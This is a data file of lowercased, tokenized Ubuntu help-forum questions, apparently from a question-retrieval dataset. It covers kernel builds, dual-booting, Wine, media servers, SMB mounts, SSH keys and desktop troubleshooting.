1662	the best way to compile a kernel for an i7 processor ?	i have compiled my own kernels for a while now . i started when i got my i7 processor and wanted its turbo boost to work properly . i 've since bought an ssd so continue to benefit from a more recent kernel than the repo version . with my most recent builds , i 've started getting weird cpu spikes . while it could be a number of different things causing this , i 'd like to focus on getting the kernel `` right '' and if possible , more optimised than ever . i follow the `` old-fashioned debian '' on the kernel/compile wiki . i do this because i 'm building from a direct download from kernel.org . first questions : should i get my source from somewhere else and should i use a different build method ? the guide suggests getting the current .config like so : cp -vi /boot/config-`uname -r` .config this is all well and good if your current configuration works well but i 'm concerned mine contains a problem ... second question : is there a good ubuntu-friendly , i7-friendly default .config file i can download from somewhere ? there are a lot of kernel patches floating around at the moment . some promise a more responsive system through patching io bugs , some give `` better '' schedulers ( bfs , et al ) but it 's hard to find decent benchmarks to see if these are worthwhile features of if they 're just unstable junk . third : are there any patches you would apply to 2.6.35 to make it more compatible with lucid ? i fear it 's make menuconfig where i screw things up . i try to turn off drivers i do n't need and select options that look like they 'll optimise things but , truth be told , i 'm not a kernel developer ; i do n't know for certain if an option will break everything or even help at all . fourth : how would you optimise the .config/build-process for an i7 and ssd ?
1668	how do i dual-boot with debian ?	i want to install debian unstable alongside maverick but i do n't want to lose my data . also my cd drive is broken .
1680	best way to set up and record dvb-c pal and share recorded streams with dnla on ubuntu ?	i have an eyetv hybrid dvb-c usb ( plus a few pinnacle dvb-t ones ) receiver which works well under os x , but i would like to have recording under ubuntu instead - preferrably with epg -and share with dnla to my tv set . what would be the best way to do so in terms of programs etc ?
1685	whither hybrid suspend ?	so what ever happened to hybrid suspend , where it would suspend to both ram and disk ? it was kind of hot a few years ago , but it seems it was dropped . is there any way to set this up in recent ubuntu versions ?
1686	how well does microsoft office excel work in wine ?	some interest in excel 2003 , but primarily in excel 2007 . wondering if advanced features , such as macros can be made to work flawlessly . or if there are any major issues i should know about . using an alternative open source native program is unfortunately out of the question due to complex macro/vba heavy spreadsheets .
1691	is there an easy way to edit gtk-recordmydesktop videos ?	gtk-recordmydesktop outputs .ogv files that seem perfectly fine - they work well in totem and vlc . however , if i try to edit them in openshot or kdenlive , the editor either crashes ( kdenlive ) or wo n't show the video properly ( openshot ) . pitivi appears to work but then locks up when it tries to render the video . using video conversion tools , such as ffmpeg outputs a video that is a jumble of colours ; although it is just about possible to make out some movement . the only way i 've managed to edit the videos is to use devede to create a dvd .iso , mount the iso and then edit the .vob file ( s ) . this is a bit of a faff ; does anyone know of a better way around this ?
1694	is it possible to import dv video using firewire ?	i know there are several video editing programs : pitivi , openshot , etc however i am unsure if i can transfer video footage from a dv tape to my computer . in other operating systems ( with the correct software ) i can connect my firewire camcorder or tape deck to a pc , and record the video to file in realtime . is this possible in ubuntu and if so which software is needed ?
1695	watch quicktime videos in the browser ?	it 's rather frustrating to me that i ca n't watch any of the videos on apple 's site . is there a quicktime plugin for chrome or firefox , and if not , why ?
1697	debugging/monitoring emacs	i 'm using gnu emacs 23.1.50.1 ( x86_64-pc-linux-gnu , gtk+ version 2.18.0 ) and start my emacs session inside gnu screen . since i upgraded to ubuntu 10.04 and the version of emacs-snapshot there i encounter some problems . sometimes emacs hogs all ram plus the same amount of swap space ( 2+2gb ) and also eats all cpu time . when i send the process a sigterm the process stops to eat cpu time , but the huge allocated amount of memory stays . emacs itself does n't take any key sequences . so usually i send the process a sigkill and it dies . now i want to find out where the bug ( if there is one ) is located and want to do some debugging . i can see no special reason for this behavior . sometimes it starts after emacs is freshly started , sometimes i can work a whole day without problems , sometimes it happens in between . so i 'm looking for a kind of debugging or monitoring the process . i tried strace , but this generates too much output . strace output of a editing session should easily fill my whole harddrive . running emacs inside gdb should also not work , because if i remember correctly ubuntu builds the software without debugging symbols . so do you have any advice how i can find the ( possible ) bug ? what would you suggest ?
1700	what is the `` keyring '' or `` keychain '' ?	can someone please explain what ubuntu 's keychain or keyring is , as well as use cases for it ?
1702	how to enable anisotropic filtering and anti-aliasing with mupen64plus 1.99.3	os : ubuntu 10.04 64-bit i have searched alll over for how to enable these with the mupen emulator . thought i might check and see if anyone here has knowledge on this . http : //code.google.com/p/mupen64plus/ i 'm really hoping i do n't have to go back to windows to use project 64 to get these . and before anyone says `` project 64 rocks with wine '' well i 'm sure it does , but no anti-aliasing in wine ... thanks in advance ! ^^
1704	turning off the backlight on the console	i 'm using an ibm thinkpad x21 as a 3g router . it 's running a server install of lucid . the laptop has the lid up most of the time . there is no x , just a plain console . the colsole blanks itself , but the lcd backlight is always on . the graphics chip is ati technologies inc rage mobility p/m agp 2x ( rev 64 ) . the following modules related to the framebuffer are now loaded : $ lsmod | grep fb fbcon 35102 71 tileblit 2031 1 fbcon font 7557 1 fbcon bitblit 4707 1 fbcon vga16fb 11385 1 vgastate 8961 1 vga16fb can i make the lcd backlight turn off when the colsole is unused and have it turn on automatically when needed ?
1705	how can i create a select menu in a shell script ?	i 'm creating a simple bash script and i want to create a select menu in it , like this : ./script echo `` choose your option : '' 1 ) option 1 2 ) option 2 3 ) option 3 4 ) quit and according to user 's choice , i want different actions to be executed . i 'm a bash shell scripting noob , i 've searched the web for some answers , but got nothing really concrete . so , shell script masters , how should i do this ? thanks .
1708	une takes about 30 minutes to start up ( installed through wubi )	for some reason my ubuntu une takes about 30 minutes to start up . all i see is - with barely any harddrive activity answering txwikinger 's comment : it happened since the first install ( this behaviour is not observed on the live usb ) the only thing installed was windows 7 server edition worthy to note , that i seem to have grub 2 . then windows boot up manager . then grub 1 edit i forgot to mention that it was installed using wubi ( my first time installation using such software ) edit 2 ( oct - 28 ) going into grub and manually loading the kernel , it gets stuck at : [ 0.797171 ] kernel ) thread_helper+0x6/0x10 ] i 'm assuming it 's either this task or the task after it that are hogging my system i also get the following error vfs : open route device `` ( null ) '' ... please append a correct `` root= '' boot kernel panic not syncing vfs unable to mount root fs on unkwon-block ( 8,1 ) pid 1 , comm : swapper not trained call trace : ? printk panic mount_block_root ? sys_mknod mount_root prepare_namespace ? sys_access kernel_init ? kernel_init kernel_thread_helper
1712	why would the aptitude binary be missing if its package is installed ?	yesterday i upgraded a laptop from kubuntu 9.04 ( lucid ) to 9.10 ( karmic ) . then afterwards i tried to install some software $ sudo aptitude install dont-remember-what-it-was and i get sudo : aptitude : command not found wait , what ? how can aptitude be missing ? and it 's not just that - apt-get and dpkg also somehow mysteriously vanished from the system . i 've manually checked in /usr/bin and all the other directories in $ path and verified that the files actually do not exist . $ ls /usr/bin/aptitude ls : can not access /usr/bin/aptitude : no such file or directory thankfully i have two graphical package managers available , adept installer and kpackagekit . both of them report that the aptitude package is installed . i tried uninstalling and reinstalling it through the gui , just to be safe , and the uninstall/reinstall seemed to go off without a hitch . but the actual program binaries are still missing . is this something normal ? if not , has anyone ever heard of it happening ? is it likely that the missing programs will magically reappear if i upgrade to 10.04 ? edit : i have no idea what was going on , but after leaving the computer off overnight and a couple of reboots , the problem seems to have fixed itself . all the right files seem to be there .
1718	how do i reset x	my computer seems to have issues suspending and resuming properly . most recently , it resumed from hibernate , was working fine until i started logging in , and then x froze completely . i can log in via ssh ( and it works flawlessly when i do ) , and i 'd love to reset it without restarting the whole computer , and preferably without crashing all my open applications . is this doable ? if i have to crash the open apps , that 's ok too , i suppose , but not preferred .
1721	i have a catch 22 here ! no internet unless i update	i have a usb internet tether , but it will not work in ubuntu , unless i download something in the terminal , but i also can not get internet until i get this device working . i am able to use my windows side on the internet , that 's how i am doing this , but not with ubuntu side . is there any way , that allows me to download a packet ( that i have directions for ) while using windows side , in the command-line ? this is the fix i found for my usb device , that i ca n't do without internet . to get it working , make sure your iphone is not plugged in . then open up terminal and add the following repository : sudo add-apt-repository ppa : pmcenery/ppa sudo apt-get update sudo apt-get install libimobiledevice-dev libimobiledevice-utils ipheth-utils gvfs after this is done , turn mywi application back on and plug it in . it will not seem to work if you have it plugged in , and then turn it on .
1722	basic ubuntu ftp server	i would like to setup a basic ftp server on my ubuntu server install . i have been playing with vsftpd , but am having issues getting the server to allow me to create directories and copy files . i have set the system to allow local users , but it appears that does n't mean i get access to create directories . this may be an instance where i need to be better grounded in ubuntu server setup in order to configure this ftp server adequately . the end goal is to be able to move files from my local dev folder into my www folder for deployment . directories need to be able to move as well . any help would be greatly appreciated .
1732	can i run android apps on ubuntu ?	is it possible to run android apps on ubuntu ? and i do n't mean inside an emulator , but natively , as you would with any other application installed using the ubuntu software center .
1733	what reason could prevent console output from `` virsh -c qemu : ///system console guest1 '' ?	i 'm running kvm on a ubuntu 10.04 host . the guest os is also ubuntu 10.04 . i am attempting to connect to the guest using the 'console ' command . it appears i can establish a connection , but i get no output . $ sudo virsh -c qemu : ///system console guest1 connected to domain guest1 escape character is ^ ] ( nothing here ) ^ ] $ i do n't have a 'serial ' device configured , but i do have these 'console ' devices . < console type='pty ' tty='/dev/pts/2 ' > < source path='/dev/pts/2'/ > < target port='0'/ > < /console > < console type='pty ' tty='/dev/pts/2 ' > < source path='/dev/pts/2'/ > < target port='0'/ > < /console > are these sufficient for a console , or do i need a serial device as well ? what do i need to do in order to get the kvm console to work ?
1736	sync notes between android phone and ubuntu ?	i want a note taking app on my ubuntu running laptop and an app on my android phone which can sync with each other , through online means or manually syncing . so far the only thing i 've seen is the evernote app for android and the beta quality third party app nevernote . ideally , i 'd like an app that syncs with tomboy , but the only thing i 've found is tomdroid which is buggy and only lets you view notes . does anyone have any suggestions ? or will i have to stick to android apps which only sync with web sites ?
1743	is aptitude still considered superior to apt-get ?	when i first started with ubuntu using aptitude was the 'in-thing ' , with some stated improvements over apt-get . am i correct in saying that apt-get has now 'caught up ' with aptitude , and it makes little difference which is used ( although it is preferable to choose one or the other , and stick with it ) ? moreover , with aptitude set to be removed from a default ubuntu install , should everyone revert to apt-get , especially when guiding new users interested in the cli ?
1751	network preferences occasionally defaulted upon login	sometimes ( but not all the time , oddly enough ) , when i log into my system , networking will be disabled by default . is this a common issue , or is there some workaround i missed to set 'on ' as the permanent default ( ! ? ) .
1752	recover ext4 partition	i was trying to resize my ext4 partition and something went wrong . i lost it . the space in once consumed is now being represented as unallocated . how do i recover the partition ?
1755	what dlna server to choose ?	what dlna server program should i choose and how do i set it up ? it is an absolute requirement that it does n't take a lot of resources since it will be running on a 500 mhz machine . there seems to be quite a few server programs and i do n't have any experience with these userfriendly auto-detecet protocols/services . btw , the server does n't have a gui ...
1758	how can i resolve the disabled bluetooth on resume/power issue on lenovo laptops ?	after you install ubuntu on a lenovo laptop the bluetooth will be disabled after reboot or resume . the only workaround for this issue is to load factory default from the bios but this is not something you want to do each time you reboot ubuntu on a dual-boot machine . the problem was reported several times over time on lenovo support forum but nobody from them bothered to take a look on this . examples : http : //forums.lenovo.com/t5/ideapad-y-u-b-and-z-series/how-to-turn-on-bluetooth-on-ubuntu-08-10/m-p/99839 http : //forums.lenovo.com/t5/t400-t500-and-newer-t-series/t400-bluetooth-doesn-t-turn-on-after-wake-up-from-standby-mode/m-p/197984
1759	how to install php-gtk ?	i ca n't find it in the repositories.i am using maverick .
1763	native , foss gui prototyping tools ?	as part of my job as a web developer , i spend an amount of time doing ui prototypes to show the client . it 's a pain in the behind but sometimes it has to be done . i 've seen shuttleworth ( and the design team ) pump out images like this : that 's made by something called balsamiq mockups ... something that balances on top of adobe air ( yack ! ) and costs $ 79 . i 've tried it but it kept falling over . i think it had something to do with air not the app itself . my point is if i 'm paying out for something , i want it to be native .
1766	lost lxde menus after replacing /home	i am trying lubuntu on an old laptop . i have before and after the install i had two partitions ( +swap ) mounting on / and on /home . when i did the lubuntu install i told it to ignore the /home partition . after the lubuntu install i logged in and everything appeared ok . i mounted the /home partition as /hold.old . then i copied all the files from /home to /home.old . then for each user i chown'ed the stuff in /home.old . then i edited /etc/fstab to mount the /home partition . then i renamed /home . then i rebooted . all my old files are where i expected them in the /home filesystem . but my lxde menu system is messed up . instead of the full menu system i only have terminal and logout . i thought that most of the menu system lived in /usr/share . but , apparently lxde has some menu stuff in /home that i did not get copied over correctly . is there a quick way to restore the default lxde menu system ? can you point some documentation that would be good for learning the sysadmin level workings of lxde ?
1767	how to access a windows shared drive/folder from ubuntu ?	specifically , what are the login credentials i need to provide ? details : the machine i want to access is running windows 7 , and i 'm sure the folder sharing is working as other windows machines can access it . in ubuntu , i can go to places - > network and i see the machine there and open it , when i try to view the shared folder it will prompt me for username/domain/password . are these credentials supposed to be my login details on the other machine ? my account there does not have a password though , should i leave it blank ? i 'm also not clear what `` domain '' needs to be .
1772	how do i mount an iso ?	i was hoping to know if ubuntu comes with a standard way of mounting isos . i looked around online and found a bunch of scripts that can do it . this to me seems like core functionality , is it offered by default in ubuntu . if not where is the best and simplest mounter for isos .
1780	printer sharing and ubuntu	i have a printer plugged it into my ubuntu desktop machine . i want to access it from windows 7 on my laptop . is this possible ? if yes , how can i do this ?
1784	how can i install steam ?	how can i install and run steam on ubuntu ?
1786	what is the difference between network manager and 'ifconfig ' 'ifup ' , etc ?	ubuntu seems to provide at least two network `` toolsets '' ( for lack of a better term ) . i 'm running into conflicts between these two . network manager something which is more like the traditional network tools ( e.g . ifconfig , 'ifup ' , /etc/network/interfaces i am often running into conflicts between these different sets of tools . for example , i 'm running ubuntu desktop at home and i 'm using software like kvm/libvirt which recommends that i disable network manager , but disabling network manager causes other things to break . what is the difference between network manager and the traditional network tools ? can these two suites run side-by-side or must i stick with one or the other ? is there a document which summarizes the difference between these different tools ? i have been unable to find one . ( forgive the vagueness of this question . i 've searched and searched for an answer , but i have only found many vague answers which do n't seem relevant to ubuntu 10.04/lucid , and i may not fully understand the purpose of networkmanager . however , this seems to be a frequently asked question . if you have advice for clarifying this question , please post a comment . )
1788	login fail with low graphics then crash ?	i was using transmission to download some stuff , when i got a notification that there was only 800 mb of free space left . i soon rebooted , only to find out , that i could not login again . i would get an error stating , that the default configuration had changed for `` gnome-power-manager '' and to contact my system-administrator , though i am the sysadmin . every time i tried to login it would fail and the whole thing was in low graphics mode . so my question is if there is a way to fix this ?
1789	why do some packages disappear from the repositories ?	i needed to install a program ( gsas & expgui ) that depends on the libg2c0 library . this library was in the repositories up to ubuntu jaunty ( 9.04 ) , and then it was removed . the solution is to download the jaunty package , and then sudo dpkg -- force-depends -i libg2c0_3.4.6-8ubuntu2_amd64.deb . if found this solution not to be in the spirit of ubuntu ( is there a word for that , like pythonic is to python ? ) in general , what are the reasons for removing a given package from newer versions ? is there a better way to manage dependencies to no longer supported packages ?
1790	is there any way to get pressure sensitivity from my wacom-drawing tablet into a web-browser ?	wacom works pretty much out of the box in ubuntu ( studio ) , but pressure sensitivity only works in specific applications , like gimp . deviantart now has released an online-application , called muro , that allows one to draw from within your webbrowser ! there is a plugin available for windows and mac os , to get pressure sensitivity in firefox , but not for linux , hence not for ubuntu . muro uses html5 technology , but no flash . is there any way to get pressure sensitivity from my wacom-drawing tablet into a web-browser ?
1792	how can i suspend/hibernate from command line ?	how can i suspend or hibernate my laptop using command line , without installing additional software ?
1793	what are the must-have apps to customize ubuntu look and feel apps ?	seeing this a big part of the ubuntu community , i have never looked at someone 's ubuntu install with thinking that looks cool , i wish i had x . how did you do that ? what are your the must have add-ons for look and feel ? e.g conky , tilda , album art , emerald , docky etc ...
1801	why no oovoo on ubuntu ?	the only reason i ever boot into windows ( 7 ) is to use the popular video chat software oovoo ( website ) . it 's useless under wine and there seems to be no way to run it in ubuntu except for some proprietary tools . does anyone have any information on some alternatives to running it with wine ?
1802	how can i fix the ( broken ) icons in the notification area upon login ?	the icons in the notification area are sometimes broken upon login . this is always fixed if i close the session and login again . see in this screenshot , the usual `` power '' button is replaced by a part of my user name . the whole username should be `` agustin '' . the problem is not just visual , if you click where the power button should be you get no functionality . interestingly , if you click on the other button , and you move the cursor qith the arrow keys , you get the menu . i believe this problem is related to the nvidia propietary drivers , but i am not sure . any ideas ? anyone had this problem like me ? -- agustă­n
1807	how can i strip down ubuntu ?	i 'm trying to fix what i consider a bloated install of ubuntu . when i install ubuntu on a machine , i get things that i do n't want - web browsers , office applications , media players , accessibility utilities , ubuntu one , and so on . my goal is to create a way that i can have an install of ubuntu that contains only the most minimal packages - the administrative tools and package manager , a gui ( my preference would be gnome ) , a text editor , core drivers ( video cards , network cards - wired and wireless , input devices ) , and anything else that i have to have to run a stable distribution . from there , i would like to pick and choose which packages i install to create my own customized system . after playing around with other distros like arch and slackware , like how they provide a barebones install by default . however , i get trapped in a `` configuration hell '' - right now , i tried moving away from ubuntu and to arch , but after spending 6 hours with it , i still do n't have a usable system . it 's half configured and i do n't have any usable software packages to enable me to work . is anything that can help me available ? either something like the opensuse builder that lets you choose applications and packages for the cd , an advanced installation mode where i can choose the packages to install and which to ignore , or a guide on how to strip ubuntu down to its bare bones ? and i suppose a natural follow up to this is once i have a stripped down ubuntu , will this affect updating at all ? when canonical releases the next version of ubuntu , i do n't want any bloatware reinstalled . and yes , most of the applications that come with ubuntu , i simply do n't use . ever .
1813	is gparted a good tool for resizing an ntfs partition ?	i have a dual-boot setup . ( ubuntu / vista ) i need to shrink the partition that vista is installed on . ( it 's an ntfs partition . ) i tried using vista 's own disk manager , but it did n't work . i heard that gparted can resize ntfs partitions - is this true ? is it a safe tool for resizing partitions ? are there any potential issues i should be aware of if i use it ?
1816	how to get more people involved in improving x.org for ubuntu ?	in ubuntu , x is one of the more critical pieces in the stack . as such , we get a ton of questions and bug reports about it , probably about 100 times as many as we have manpower to handle . canonical is hiring additional engineers to work on x which will help , but still there are many things that are outside the scope of what canonical can do , so i feel it is really important to have a strong community involved in improving x in ubuntu , particularly around getting all these massive amounts of bug reports answered , triaged , and ( hopefully ) solved . however , it 's tough to find people to work on x or to convince people that it is worthwhile for them to invest their time in it . how would you suggest going about encouraging people to get involved , who might not otherwise be thinking of working on x ?
1820	can i use networkmanager without a tray/dock/bar ?	i would like to use networkmanager , but prefer a keyboard driven window manager that provides as much space on the screen as possible for my code . i just hate that little strip of real estate `` trays '' take up on my screen . i have tried running nm-* from the command line , but they seam to never work without a tray .
1829	how can i add a separator to the place sidebar in nautilus ?	i 'd like to drag a few more folders to the places sidebar in nautilus , but want to group these new ones separately to the default folders ( like dropbox , downloads and documents ) . is there a way to add a new separator to the list ?
1830	will plymouth allow for a nice boot experience with proprietary graphics drivers in future ?	the new graphical bootloader introduced in 10.04 ( plymouth ) looks amazing until i enable proprietary drivers for my video card . i then get a horrible flashy monster of a boot experience , which i can cope with if i have to , but i 'm sure would be offputting for newer users . my understanding is that plymouth depends on features that currently are n't available in the proprietary drivers . my question is , is this likely to change , or should i just get used to 'one or the other ' ( i.e . a nice boot experience or a nice desktop experience , but not both ) ? can we expect to see plymouth playing nice with proprietary graphics drivers in future , or is this solely reliant on work from the proprietary manufacturers ?
1832	is it possible to install ubuntu on a mac using bootcamp ?	i want a native ubuntu installation , not an vm . do i have options on my mac ( that do n't involve destroying the 'mac ' portion of it ) or should i just switch to a standard pc ? if i do have options , it would be nice to know what they are : -p
1836	problems mounting an smb share in my fstab	i have a valid , reachable smb share on my windows box , which i can mount with sudo mount -t cifs //192.168.0.9/c /mnt/winc -o username=foo , password=bar but is n't mountable from my fstab . the fstab entry reads //192.168.0.9 /mnt/winc credentials=/root/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 and the credentials file ( which has 777 permissions while i get this working ) contains username=foo password=bar but sudo mount -a results in an error , which from a dmesg | tail , shows [ 225040.991705 ] cifs vfs : no username specified [ 225050.991721 ] cifs vfs : cifs_mount failed w/return code = -22 anyone else seen this issue and managed to resolve it ?
1844	is there a keyboard-centric desktop/wm available ?	i know of the awesome window manager , which after some customization may suit my desires , but i was wondering if there is a keyboard-centric desktop environment that does n't require too much tweaking to make it really useful . of course gnome and i 'm sure kde have nice shortcuts , and the ability to set them up how you want , but that becomes a problem because in a lot of cases the keyboard ends out conflicting with built-in program behavior . any suggestions ?
1846	how can wolfenstein enemy teritory with dependency on libgtk1.2 be installed on ubuntu ?	hey , im trying to install wolfenstein e.t however it comes up with this error message when running , saying its missing libgtk-1.2 . in the repos there is only libgtk2.0 any ideas how i can get around this problem ?
1847	is there a tablet-centric desktop available for ubuntu ?	i have a lenovo x61 tablet pc running ubuntu 10.04 . i 've got karol krizka 's auto-rotate daemon working , along with a variety of other applications like cellwriter , though for some reason even when it 's working properly , it needed a fix for me . there 's a host of other applications i use such as xournal , for general notetaking mypaint , for drawing easystroke , for gesture recognition probably others that i forget at the moment ... but i was wondering if there are any good tablet-oriented desktop environments for ubuntu ?
1861	why is n't my monitor 's native resolution appearing as an option ?	i 'm on a clean install of ubuntu 10.04 lts . my monitor 's native resolution is 1280x1024 . however , in the monitor preferences application , i am only presented with 640x480 and 800x600 as options . my video card is an on board matrox g200ew . i tried installing the proprietary driver from matrox 's website , but the installer immediately throws four errors . i also tried using xrandr to set my resolution , but it simply pops back saying `` size 1280x1024 not found in available modes . '' how can i get 1280x1024 added to my available sizes to that i can switch to it ?
1863	where can i find the gnome applets scripts that i can look at them ?	how can i see the code of gnome panels ? for example view the code is executed when i click on shutdown button in the panel .
1866	themes mess up any time i install anything in wine	every time i remove or install anything to do with microsoft , either it be fonts or dependencies for wine . i constantly find my theme messing up . does anyone know why this happens ? please and thank you .
1871	how can i safely shutdown/reboot/logout kde from the command line ?	i am not talking about shutdown and reboot commands . i want to initiate the same routine from command line that would be performed if i would press the logout/reboot/shutdown button inside the kde desktop .
1874	are there any good books for new ubuntu user ?	i recently installed ubuntu in my uncle 's laptop . he seems to like it and he is asking me for some good ubuntu books for beginners . i was thinking about the official ubuntu book . any other suggestions would be very much appreciated . he comes from a windows background if that would help .
1877	what is the easiest way to resolve apt-get badsig gpg errors ?	i frequently cross this issue , and always have to google for an answer . does anyone have a permanent fix for badsig errors from apt-get ? w : gpg error : http : //download.virtualbox.org lucid release : the following signatures were invalid : badsig 54422a4b98ab5139 oracle corporation ( virtualbox archive signing key )
1881	what are good cd ripping programs ?	what are some good cd ripping programs for ubuntu ? pros ? cons ? i currently use rhythmbox as my player and often will load these files into my android phone .
1889	kernel > 2.6.32-20 does n't boot ( root file system does not exist )	one of my notebooks is a compaq nc4200 ( mobile intel 915gm express ) . all ubuntu kernels > 2.6.32-20 do n't boot on that machine . instead i get an error message : error : unexpectedly disconnected from boot status daemon begin : waiting for root file system ... after some googling i found bug # 574755 in debians bts . in this case plymouth had some bug . so i tried to add i915 modeset=1 to /etc/initramfs-tools/modules . this made the boot screen complete lack . i saw no output anymore . second i tried to remove the plymouth-package . after purging it i got the same message again . i dug a bit further . from my point of view this must be some kind of file system thing . output from boot : begin : running /scripts/init-premount ... done . begin : mounting root file system ... begin : running /scripts/local-top ... done . begin : waiting for root file system ... ` after some time there is a timeout and a busybox shell appears : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! r/dev/disk/by-uuid/ ( uuid-of-my-sda1 ) does not exist . dropping to a shell ! busybox v1.19.3 ( ubuntu 1:1.10.3-7ubuntu1.1 ) built-in shell ( ash ) enter 'help ' for a lost of built-in commands . ( initramfs ) now i 'm out of ideas . what can be the cause of it ? how i resolve this issue ?
1892	conexant modem in ubuntu	previously linuxant release driver for conexant modem ( hcf or hsf ) , now for newer kernel this site does n't release for newer kernel version ( after 2.6.31-17 version ) . how to use conexant modem in ubuntu with newer kernel than 2.6.31-17 ( ... , 10.4 , ... ) ? linuxant ubuntu driver : http : //www.linuxant.com/drivers/hsf/full/downloads-ubuntu-x86.php
1895	how should i synchronize configurations and data across computers ?	imagine i have three ubuntu computers home , laptop , beach-house . they all have the same version of ubuntu , 10.04 installed , and are kept up to date from the repositories . i use f-spot , thunderbird , and google-chrome on all of the computers . is there a way to keep the data and configuration in sync across them , without requiring constant connectivity for normal ( non-synchronous ) usage ? for example , they should be usable without network connectivity , so something like nfs wo n't work . an ideal solution would not require manual action to start the syncing process .
1907	if i need a specific library how do i find out which packages can install that library ?	if i know the name of a library ( eg . libnss3.so ) how do i figure out which package to install to get this library ? is there an easier way to do this ?
1908	no wireless and display issues on dell inspiron 1210 ( mini 12 )	i recently upgraded a friend 's dell mini 12 ( inspiron 1210 ) from ubuntu 8.10 to 10.04 netbook edition . after installing , and performing the available updates , i 'm unable to detect any wireless networks ( it knows it has a wireless card , but wo n't list any active networks ) . there also seems to be an issue with the display drivers : when scrolling , resizing , or drawing any windows there is a noticeable lag as i watch the screen redraw . as if there are no compatible display drivers installed . all these problems go away the moment i boot up a version of 8.10 . but i 'd like to keep 10.04 if possible . are these common problems ? everything i 've read suggest this is laptop should be compatible . any suggestions ? thanks .
1909	login keyring box frozen	i 'm new to ubuntu and i 'm afraid i 've done something really stupid . after booting , when prompted to enter a password to unlock my login keyring , i tried to enter in my password , but it wo n't let me . i can move my cursor but everything else is frozen . i tried to access the terminal by using ctrl + alt + f2 , i entered my login and password from there and it worked , i just do n't know what to do afterwards . do n't know what other information i can provide other than the fact that i am using ubuntu 10.04
1916	how can i access system mail in /var/mail/ via thunderbird ?	i 've got cron jobs sending mail to my user at /var/mail . i know how to access that at the command line with the mail command . but , while a big command line fan , i do not like reading mail ( even system mail ) that way . my mail client of choice is thunderbird . can i read /var/mail messages in thunderbird ? how ? i 'm running ubuntu 9.04 and thunderbird 2.0.0.24 ( though i 'm soon to upgraded to 10.04 ) .
1918	how do i troubleshoot booting into black screen ?	i installed lucid lynx over pxe onto this dell server seemingly successfully , but booting from the hd results in a black , unpowered screen . there appears to be no network connectivity to the box either . it may have landed at a textual busybox type prompt , but i ca n't see it . ctrl-alt-delete seems to reboot . on my last attempt i held shift and the grub menu came up , but recovery mode produced the same results . should i drop into the grub prompt and give the kernel a magical boot option ? should i boot from a rescue cd and munge some bits on the hd ? give up and install windows ?
1919	how can i disable ctrl+q for all applications ( system wide ) ?	a lot of applications like firefox , chrome etc , get closed when i accidentally press ctrl+q instead of ctrl+w because of the proximity of the q and w keys on the keyboard . is there a way this shortcut can be removed or reset on a system wide basis ?
1926	how can the font size in empathy be configured ?	empathy uses a very small font size . i 'd like to have some larger font . but the system setting has no entry for fonts . how can i use another/larger font in empathy ?
1927	how long till a package shows up in the repository ?	a package was recently added to ubuntu . ( it was synced from debian . ) i searched for it on http : //packages.ubuntu.com but it is n't showing up . how long does it take ?
1938	what ubuntu / linux podcasts are most helpful ?	which podcasts in either the ubuntu or general linux categories are the most helpful or most enjoyable . one podcast per answer which could be voted independently would be useful and possibly mentioning if it is highly technical , generally informative , or just fun .
1942	how can evolution connect to exchange via the owa connector ?	i have been trying for a while to get evolution to connect to my exchange account . i think the complication is the that the owa url is https : //owa [ ... ] . i am able to connect with android phones , iphones , etc. , but i ca n't do it with evolution . is there a way to make this work ?
1943	`` ubuntu is an ancient african word , meaning 'i ca n't configure debian . ' '' -- why did they write that ?	from urban dictionary ubuntu is defined as `` ubuntu is an ancient african word , meaning `` i ca n't configure debian '' '' . http : //www.urbandictionary.com/define.php ? term=ubuntu i 'm confused for that ... how true is this sentence ? are really ubuntu and debian so close to each other ?
1954	are there any packages in ubuntu that allow routing on application layer level ?	i would like to route packages received by a vm host to different vm guest , on basis of application layer , in particular domains given in urls . it is impossible to route on network layer level , since ip address limitations ( to the outside ) do not allow this .
1956	how can i prevent or diminish nautilus freezing problems ?	after upgrading the ubuntu to 10.04 my nautilus file manager gives lot of problem . nautilus freezes after few minutes of start . i tried with thunar , but i did not like that . now i have dolphin too , when nautilus goes problem , then i start work with dolphin . i do not like this . i want to work on nautilus or equivalent one . i work with lot of images using gimp and inkscape . i tried many things including reinstalled the os for 6 time in 4 months . i can not leave ubuntu , but i am limbing . some body help me to fix it . thanks in advance .
1962	how can multiple private keys be used with ssh ?	i was able to setup ssh to use private/public key authentication . now i am able to do ssh user @ server1 and it logs on with the private key . now i want to connect to another server and use a different key . how do set it up so ssh user @ server1 uses privatekey1 ssh user @ server2 and uses privatekey2
1966	is there any simple way to install tarballs ?	most linux software is packaged in tarballs . all of them require but a few commands to compile and install them . my question is ; we have gdebi for standalone debian packages , so why not an app to install tarballs the same way ? why is such an apparently simple process not automated ? why must we continue to intimidate and drive away new users with ideas of compiling software ?
1974	how can i add the network manager applet to the panel after removing ?	in rearranging the panel , i removed the network manager applet . i tried to add it back , but it does n't show up in the list ( add to panel ) . i can start it up and see it as a running process ( nm-applet ) , and i 'm still connected to the internets , but i do n't know how to get the panel icon back .
1978	alternate look for the gnome main menu	on my desktop computer , the gnome main menu on the panel has a different look : it 's just one `` ubuntu logo '' icon ; clicking on it displays the `` applications '' menu on top , with `` resources '' and `` system '' being two sub-menus ( last two entries ) . i actually like this alternate style more than the default one , and would like to have it on my laptop as well . what should i set/alter to have the alternate look on another computer ? ( the desktop has always been this way -- i guess it 's because it was a debian machine before , and i installed ubuntu without reformatting /home . )
1982	how can i set up an authenticated encrypted smtp server ?	i 'd like to set up authenticated , encrypted smtp on my remote ubuntu server , how do i do that ? it 's just a personal server , so i 'd like a cheap option , i.e . not buying ssl certs - self-signed will do for now at least . update : i 'm a little tied to exim as i 've got some other stuff configured in that .
1986	is it possible to run my ubuntu install from within my windows install ?	i have windows xp and ubuntu installed on separate partitions . is it possible to `` boot '' my ubuntu install from within windows ? what i am looking for is something similar to a virtual machine , but that will run the copy of ubuntu already installed on my hard drive . i 'd like to be able to dualboot ubuntu and windows , but also have the ability to access my ubuntu install from within windows without having to reboot .
1991	disable password access through ssh ?	i 'm setting up a server for backing up my desktop box remotely . i want to prevent remote password access to the server , permitting only users with private keys ( aka my desktop box ) to access it . how can i block remote password access while allowing physical password access to the server ?
